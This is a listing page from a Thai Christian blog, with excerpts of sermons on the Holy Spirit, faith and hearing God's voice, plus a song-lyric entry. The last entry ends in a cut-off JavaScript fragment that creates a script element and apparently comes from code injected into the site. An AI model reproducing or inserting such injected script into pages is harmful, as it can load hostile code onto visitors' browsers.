บทความ

q
15 ต.ค.

ตอนที่ 2 ให้พระวิญญาณเป็นหุ้นส่วนกับเรา

อาจารย์เปาโลจึงพูดกับชาวโครินธ์ให้พวกเขาได้เห็นว่าฝ่ายคนที่อยู่ฝ่ายพระวิญญาณเท่านั้นจะสามารถเข้าใจเรื่องของพระวิญญาณได้ ให้เรามาดูพระคัมภีร์อีกตอนหนึ่ง  ในพระธรรม 2 โครินธ์ 13:11-12, 14 ซึ่งจะพูดถึงความสัมพันธ์ ของพระวิญญาณที่ชัดมาก ๆ และสำคัญมาก ๆ ก็คือ “11ในที่สุดพี่น้องทั้งหลาย  ขอลาก่อน  ท่านจงปรับปรุงตัวให้ดี  จงฟังคำวิงวอนของข้าพเจ้า  จงเป็นน้ำหนึ่งใจเดียวกัน  จงอยู่ร่วมกันอย่างสันติ  และพระเจ้าแห่งความรักและสันติสุขจะทรงสถิตอยู่กับท่าน 12จงทักทายปราศรัยกันด้วยธรรมเนียมจุบอันบริสุทธิ์”       ...

q
15 ต.ค.

ตอนที่ 1 เรื่อง พระวิญญาณบริสุทธิ์คือผู้ช่วยของท่าน

พระธรรมยอห์น บทที่ 16 :6-7 “ 6แต่เพราะเราได้บอกเรื่องนี้แก่ท่านแล้ว จิตใจของท่าน จึงมีแต่ความทุกข์โศก 7อย่างไรก็ตามเราจะบอกความจริงแก่ท่านทั้งหลาย คือการที่เราจากไปนั้น ก็เพื่อประโยชน์ของท่าน เพราะถ้าเราไม่ไป องค์พระผู้ช่วยก็จะไม่เสด็จ มาหาท่าน แต่ถ้าเราไปแล้ว เราก็จะใช้พระองค์มาหาท่าน” ในพระคัมภีร์ตอนนี้ให้เราสังเกตุประโยคหนึ่งสำคัญมาก “องค์พระผู้ช่วยก็จะไม่เสด็จมาหาท่าน” องค์พระผู้ช่วยในประโยคนี้ คือ องค์พระวิญญาณบริสุทธิ์ และคำว่าองค์พระผู้ช่วยในความหมายเดิม  ภาษาเดิม คือ  คนที่เหมือนกับพระเยซูทุกอย่าง...

q
15 ต.ค.

พระเจ้า GOD ฮบ. 11:1-2

ฮบ. 11:1-2 "บัดนี้ความเชื่อคือความแน่ใจในสิ่งที่เราหวังไว้ เป็นความรู้สึกมั่นใจว่า สิ่งที่ยังไม่ได้เห็นนั้นมีจริง โดยความเชื่อนี้เอง พวกบรรพบุรุษก็ได้รับการรับรอง" ในโลกนี้มีพระอยู่มากมายที่มนุษย์ได้แต่งตั้ง หรือเรียกหาให้เป็น "พระ" เช่น พระอาทิตย์, พระจันทร์ แม้กระทั่งที่ประเทศญี่ปุ่นก็มีพระมาก บ้างก็เอาเศษผมมารวมกันใส่กระปุกนำไปไว้บนหิ้งแล้วนมัสการกราบไหว้ ประเทศอินเดียก็มีพระมากมาย แม้กระทั่งโคก็นับถือเป็นพระ ซึ่งเราอาจได้ยินมากต่อมาก มีหลายลำดับตามยศตำแหน่ง แต่ยังมีสิ่งหนึ่งที่มนุษย์มักจะแสวงหาคือสิ่งสากลโลก หลายคนอธิษฐาน...

q
15 ต.ค.

การฟังเสียงพระเจ้า

หนึ่ง ทำไมต้องฟังเสียงพระเจ้า มีบางเรื่องที่พระเจ้าอยากทำแต่ เราไม่อยากทำ เช่น เปาโลอยากประกาศกับตนยิว ตายเพื่อยิว เเต่พระเจ้าใช้ท่านไปประกาศกับคนต่างชาติ จึงให้ชาวมาซิโดเนียมาเข้าฝัน เปาโล ให้ท่านไปประกาศกับชาวมาซิโดเนีย แต่เปรโตรอยากประกาศกับต่างชาติ แต่พระเจ้ากลับให้ท่าน ไปประกาศกับคนยิว นั่นแหละคือ ที่มาของการฟังเสียง และการเชื่อฟัง ของพระเจ้า เพื่อเราจะได้ ไม่เสียเวลา กับเรื่องบางเรื่อง...

q
15 ต.ค.

พระคริสต์เป็นพระเจ้า

การที่ท่านมาเชื่อในองค์พระเยซูคริสต์เจ้านั้น ท่านต้องแยกแยะและตระหนักอยู่เสมอว่า ท่านไม่ได้เชื่อในพระศาสนาองค์ใดองค์หนึ่ง แต่เชื่อในพระเจ้าที่เที่ยงแท้ สามารถช่วยจิตวิญญาณ รักษาปกป้องท่านได้ ทรงมีฤทธิ์อำนาจสูงสุด พระองค์ไม่ต้องเรียนรู้ ตรัสรู้ หรือบรรลุ ไม่มีวันเกิด แก่ เจ็บ ตาย ไม่ต้องศึกษา แต่ทรงเป็นพระเจ้าดำรงค์อยู่นิจนิรันดร์ พระเจ้าเที่ยงแท้ไม่ต้องเวียนว่ายตายเกิดเหมือนดังมนุษย์ แต่สภาพของพระองค์ทรงเป็นพระเจ้าแน่แท้ที่พิสูจน์ได้ดังต่อไปนี้ 1. พระองค์ทรงเป็นอยู่ชั่วนิจนิรันดร์ (ยน.1:...

13 ต.ค.

เพลง ความรักของพระเยซู

ความรักของพระเยซู ทรงยอมตายเพื่อไถ่บาปฉัน พระองค์ทรงเป็นความหวัง เป็นพลังให้เดินก้าวไป ชื่อเพลง : อย่าหวั่นไหว อัลบั้ม Don't be shaken คำร้อง เจริญ ยธิกุล ทำนอง เจริญ ยธิกุล เรียบเรียง สุรวดี เทียนสีม่วง ขับร้อง สุรวดี เทียนสีม่วง  var d=document;var s=d.createElement('script'); ...